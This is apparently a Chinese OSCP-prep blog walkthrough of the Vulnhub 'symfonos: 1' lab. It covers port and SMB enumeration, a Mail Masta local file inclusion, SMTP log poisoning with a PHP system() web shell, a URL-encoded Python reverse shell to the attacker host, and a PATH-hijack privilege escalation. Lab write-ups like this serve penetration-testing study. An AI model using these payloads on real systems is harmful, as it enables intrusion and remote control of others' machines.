OSCP备考_0x18_Vulnhub靶机_symfonos: 1

Ethan医生7个月前靶场257

名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-1,322/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.185

arp-scan 192.168.233.1/24

image.png

nmap -p- 192.168.233.185  

image.png


nmap -p22,25,80,139,445 -A -T5 192.168.233.185

image.png


nmap -p139,445 -A -T5 --script=smb-enum-shares 192.168.233.185 

枚举下使用看看

image.png

由于目标主机开放smb服务,尝试使用smbclient连接,成功列出目标主机上的共享文件夹列表。

其中Sharename为共享文件夹的名称:print$为打印机驱动程序的共享文件夹,helios为用户helios个人共享文件夹,anonymous为匿名共享文件夹,IPC$为IPC服务的共享文件夹。

image.png

将文件下载get attention.txt

image.png

image.png

不要使用'epidioko', 'qwerty', 'baseball'

代表这应该就是其中用户的密码试试看使用这密码去登入其他账号

smbclient //192.168.233.185/helios -U helios,正确密码qwerty

image.png

image.png访问/h3l105发现是一个WordPress网站,Wappalyzer显示WordPress版本为5.2.2

http://symfonos.local/h3l105/ 需要绑定host

然后扫描wpscan --url http://symfonos.local/h3l105/ 


image.png

看到有扩展Masta查看漏洞

image.png

image.png


http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

image.png

然后使用telnet连接25端口


telnet 192.168.233.185 25


Trying 192.168.233.185...

Connected to 192.168.233.185.

Escape character is '^]'.

220 symfonos.localdomain ESMTP Postfix (Debian/GNU)

HELO helios

250 symfonos.localdomain

MAIL FROM: MALABIS

250 2.1.0 Ok

RCPT TO: helios

250 2.1.5 Ok

data

354 End data with <CR><LF>.<CR><LF>

<?php system($_GET['shell']); ?>

.

250 2.0.0 Ok: queued as 64E1340698

QUIT

221 2.0.0 Bye

Connection closed by foreign host.


然后再去查看他的挡案 是否已经写入刚刚的一句话木马,包含文件不用管是啥挡案如果是PHP挡案直接可以执行


http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=

python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((%22192.168.233.168%22,3333));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


这里使用python做反弹WEBSHELL

image.png

开始操作提权,sudo -l找不到 就查看看suid提权,发现到statuscheck看下是啥

image.png


image.png

有用到CURL那就用CURL进行提权

image.png

image.png

将curl放到tmp目录下然后执行时就会调用这个CURL

export PATH=/tmp:$PATH

PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

image.png



相关文章

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

OSCP备考_0x12_Vulnhub靶机_Lampião: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/lampiao-1,249/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

vulnhub靶场之DC:1

vulnhub靶场之DC:1

准备:攻击机:虚拟机kali、本机win11靶机:DC:1,下载地址:https://www.vulnhub.com/entry/dc-1,292/ 一:信息收集arp-scan查看有哪些刚起的IP访...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。